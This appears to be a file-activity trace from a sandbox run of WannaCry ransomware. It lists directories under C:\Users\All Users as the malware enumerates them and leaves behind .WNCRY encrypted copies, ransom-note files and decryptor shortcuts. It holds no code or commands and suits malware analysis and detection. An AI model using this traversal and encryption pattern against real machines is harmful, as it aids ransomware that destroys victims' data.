C:\Users\All Users\chocolatey\lib\winrar\~SD8A96.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\*
C:\Users\All Users\chocolatey\lib\winrar\tools
C:\Users\All Users\chocolatey\lib\winrar\tools\~SD8AD6.tmp
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\*
C:\Users\All Users\chocolatey\lib-bad
C:\Users\All Users\chocolatey\lib-bad\~SD8B44.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\*
C:\Users\All Users\chocolatey\lib-bad\adobereader
C:\Users\All Users\chocolatey\lib-bad\adobereader\~SD8BA3.tmp
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\*
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\~SD8BE3.tmp
C:\Users\All Users\chocolatey\logs\*
C:\Users\All Users\chocolatey\logs
C:\Users\All Users\chocolatey\logs\~SD8C41.tmp
C:\Users\All Users\chocolatey\redirects\*
C:\Users\All Users\chocolatey\redirects
C:\Users\All Users\chocolatey\redirects\~SD8C90.tmp
C:\Users\All Users\chocolatey\redirects\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\redirects\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\tools\*
C:\Users\All Users\chocolatey\tools
C:\Users\All Users\chocolatey\tools\~SD8D4D.tmp
C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRY
C:\Users\All Users\chocolatey\tools\7zip.license.txt
C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRY
C:\Users\All Users\chocolatey\tools\shimgen.license.txt
C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\tools\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Favorites\*
C:\Users\All Users\Microsoft\*
C:\Users\All Users\Microsoft
C:\Users\All Users\Microsoft\~SD8E19.tmp
C:\Users\All Users\Microsoft\Assistance\*
C:\Users\All Users\Microsoft\Assistance
C:\Users\All Users\Microsoft\Assistance\~SD8EA7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\*
C:\Users\All Users\Microsoft\Assistance\Client
C:\Users\All Users\Microsoft\Assistance\Client\~SD8EB7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\*
C:\Users\All Users\Microsoft\Assistance\Client\1.0
C:\Users\All Users\Microsoft\Assistance\Client\1.0\~SD8EF7.tmp
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\*
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\~SD8F17.tmp
C:\Users\All Users\Microsoft\ClickToRun\*
C:\Users\All Users\Microsoft\ClickToRun
C:\Users\All Users\Microsoft\ClickToRun\~SD8F47.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData
C:\Users\All Users\Microsoft\ClickToRun\MachineData\~SD8F48.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\~SD8F49.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\~SD8F4A.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\~SD8F4B.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\~SD8F5C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\~SD8F6C.tmp
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\*
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups
C:\Users\All Users\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\~SD8F8C.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\*
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\~SD8FDC.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\*
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\~SD902B.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\*
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\en-us.16\~SD90E7.tmp
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\*
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16
C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1769D00C-76B0-44E0-A548-8DB5C12F3A69\x-none.16\~SD9117.tmp
C:\Users\All Users\Microsoft\ClickToRun\UserData\*
C:\Users\All Users\Microsoft\ClickToRun\UserData
C:\Users\All Users\Microsoft\ClickToRun\UserData\~SD9147.tmp
C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\*
C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}
C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\~SD9186.tmp
C:\Users\All Users\Microsoft\Crypto\*
C:\Users\All Users\Microsoft\Crypto
C:\Users\All Users\Microsoft\Crypto\~SD91B6.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\*
C:\Users\All Users\Microsoft\Crypto\DSS
C:\Users\All Users\Microsoft\Crypto\DSS\~SD91B7.tmp
C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\*
C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys
C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys\~SD91B8.tmp
C:\Users\All Users\Microsoft\Crypto\Keys\*
C:\Users\All Users\Microsoft\Crypto\Keys
C:\Users\All Users\Microsoft\Crypto\Keys\~SD91B9.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\*
C:\Users\All Users\Microsoft\Crypto\PCPKSP
C:\Users\All Users\Microsoft\Crypto\PCPKSP\~SD91BA.tmp
C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\*
C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK
C:\Users\All Users\Microsoft\Crypto\PCPKSP\WindowsAIK\~SD91BB.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\*
C:\Users\All Users\Microsoft\Crypto\RSA
C:\Users\All Users\Microsoft\Crypto\RSA\~SD91BC.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\*
C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys
C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys\~SD91BD.tmp
C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\*
C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18
C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\~SD91CE.tmp
C:\Users\All Users\Microsoft\Device Stage\*
C:\Users\All Users\Microsoft\Device Stage
C:\Users\All Users\Microsoft\Device Stage\~SD91CF.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\*
C:\Users\All Users\Microsoft\Device Stage\Device
C:\Users\All Users\Microsoft\Device Stage\Device\~SD91D0.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\*
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\~SD91D1.tmp
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\*
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\~SD91D2.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\*
C:\Users\All Users\Microsoft\Device Stage\Task
C:\Users\All Users\Microsoft\Device Stage\Task\~SD91D3.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\*
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\~SD91D4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\*
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\~SD91F4.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\*
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\~SD9272.tmp
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\*
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\~SD92B2.tmp
C:\Users\All Users\Microsoft\DeviceSync\*
C:\Users\All Users\Microsoft\DeviceSync
C:\Users\All Users\Microsoft\DeviceSync\~SD92D2.tmp
C:\Users\All Users\Microsoft\Diagnosis\*
C:\Users\All Users\Microsoft\Diagnosis
C:\Users\All Users\Microsoft\Diagnosis\~SD9302.tmp
C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\*
C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader
C:\Users\All Users\Microsoft\Diagnosis\AsimovUploader\~SD9341.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\*
C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios
C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\~SD93B0.tmp
C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\*
C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings
C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\~SD93FF.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\*
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\~SD943E.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\*
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\AutoLogger\~SD945F.tmp
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\*
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger
C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\~SD94AE.tmp
C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\*
C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore
C:\Users\All Users\Microsoft\Diagnosis\LocalTraceStore\~SD951C.tmp
C:\Users\All Users\Microsoft\Diagnosis\Sideload\*
C:\Users\All Users\Microsoft\Diagnosis\Sideload
C:\Users\All Users\Microsoft\Diagnosis\Sideload\~SD955C.tmp
C:\Users\All Users\Microsoft\Diagnosis\SoftLanding\*
C:\Users\All Users\Microsoft\Diagnosis\SoftLandingStage\*
C:\Users\All Users\Microsoft\DRM\*
C:\Users\All Users\Microsoft\DRM
C:\Users\All Users\Microsoft\DRM\~SD958B.tmp
C:\Users\All Users\Microsoft\DRM\Server\*
C:\Users\All Users\Microsoft\DRM\Server
C:\Users\All Users\Microsoft\DRM\Server\~SD95DB.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\*
C:\Users\All Users\Microsoft\EdgeUpdate
C:\Users\All Users\Microsoft\EdgeUpdate\~SD962A.tmp
C:\Users\All Users\Microsoft\EdgeUpdate\Log\*
C:\Users\All Users\Microsoft\EdgeUpdate\Log
C:\Users\All Users\Microsoft\EdgeUpdate\Log\~SD9669.tmp
C:\Users\All Users\Microsoft\eHome\*
C:\Users\All Users\Microsoft\eHome
C:\Users\All Users\Microsoft\eHome\~SD9689.tmp
C:\Users\All Users\Microsoft\eHome\logs\*
C:\Users\All Users\Microsoft\eHome\logs
C:\Users\All Users\Microsoft\eHome\logs\~SD96E8.tmp
C:\Users\All Users\Microsoft\Event Viewer\*
C:\Users\All Users\Microsoft\Event Viewer
C:\Users\All Users\Microsoft\Event Viewer\~SD9737.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\*
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\~SD9767.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\*
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\~SD9797.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\*
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\~SD97D7.tmp
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\*
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon
C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\*
C:\Users\All Users\Microsoft\Event Viewer\Views
C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\*
C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode
C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
C:\Users\All Users\Microsoft\IdentityCRL\*
C:\Users\All Users\Microsoft\IdentityCRL
C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
C:\Users\All Users\Microsoft\Media Player\*
C:\Users\All Users\Microsoft\Media Player
C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
C:\Users\All Users\Microsoft\MF\*
C:\Users\All Users\Microsoft\MF
C:\Users\All Users\Microsoft\MF\~SD9925.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\*
C:\Users\All Users\Microsoft\Microsoft Security Client
C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\Support\*
C:\Users\All Users\Microsoft\Microsoft Security Client\Support
C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
C:\Users\All Users\Microsoft\NetFramework\*
C:\Users\All Users\Microsoft\NetFramework
C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\*
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
C:\Users\All Users\Microsoft\Network\*
C:\Users\All Users\Microsoft\Network
C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
C:\Users\All Users\Microsoft\Network\Connections\*
C:\Users\All Users\Microsoft\Network\Connections
C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
C:\Users\All Users\Microsoft\Network\Downloader\*
C:\Users\All Users\Microsoft\Network\Downloader
C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
C:\Users\All Users\Microsoft\Office\*
C:\Users\All Users\Microsoft\Office
C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\*
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\*
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
C:\Users\All Users\Microsoft\RAC\*
C:\Users\All Users\Microsoft\RAC
C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
C:\Users\All Users\Microsoft\RAC\Outbound\*
C:\Users\All Users\Microsoft\RAC\Outbound
C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
C:\Users\All Users\Microsoft\RAC\PublishedData\*
C:\Users\All Users\Microsoft\RAC\PublishedData
C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
C:\Users\All Users\Microsoft\RAC\StateData\*
C:\Users\All Users\Microsoft\RAC\StateData
C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
C:\Users\All Users\Microsoft\RAC\Temp\*
C:\Users\All Users\Microsoft\RAC\Temp
C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
C:\Users\All Users\Microsoft\Search\*
C:\Users\All Users\Microsoft\Search
C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
C:\Users\All Users\Microsoft\Search\Data\*
C:\Users\All Users\Microsoft\Search\Data
C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\*
C:\Users\All Users\Microsoft\Search\Data\Applications
C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\*
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\*
C:\Users\All Users\Microsoft\Search\Data\Temp
C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\*
C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc
C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
C:\Users\All Users\Microsoft\User Account Pictures\*
C:\Users\All Users\Microsoft\User Account Pictures
C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
C:\Users\All Users\Microsoft\User Account Pictures\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\*
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Vault\*
C:\Users\All Users\Microsoft\Vault
C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\*
C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204
C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
C:\Users\All Users\Microsoft\Windows\*
C:\Users\All Users\Microsoft\Windows
C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
C:\Users\All Users\Microsoft\Windows\AIT\*
C:\Users\All Users\Microsoft\Windows\AIT
C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
C:\Users\All Users\Microsoft\Windows\Caches\*
C:\Users\All Users\Microsoft\Windows\Caches
C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
C:\Users\All Users\Microsoft\Windows\Caches\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\*
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\*
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
C:\Users\All Users\Microsoft\Windows\DRM\*
C:\Users\All Users\Microsoft\Windows\DRM
C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
C:\Users\All Users\Microsoft\Windows\DRM\Cache\*
C:\Users\All Users\Microsoft\Windows\DRM\Cache
C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
C:\Users\All Users\Microsoft\Windows\GameExplorer\*
C:\Users\All Users\Microsoft\Windows\GameExplorer
C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\*
C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics
C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
C:\Users\All Users\Microsoft\Windows\Ringtones\*
C:\Users\All Users\Microsoft\Windows\Ringtones
C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
C:\Users\All Users\Microsoft\Windows\Ringtones\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows\Ringtones\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows\Sqm\*
C:\Users\All Users\Microsoft\Windows\Sqm
C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\*
C:\Users\All Users\Microsoft\Windows\Sqm\Manifest
C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\*
C:\Users\All Users\Microsoft\Windows\Sqm\Sessions
C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Upload\*
C:\Users\All Users\Microsoft\Windows\Sqm\Upload
C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\*
C:\Users\All Users\Microsoft\Windows\Start Menu
C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\*
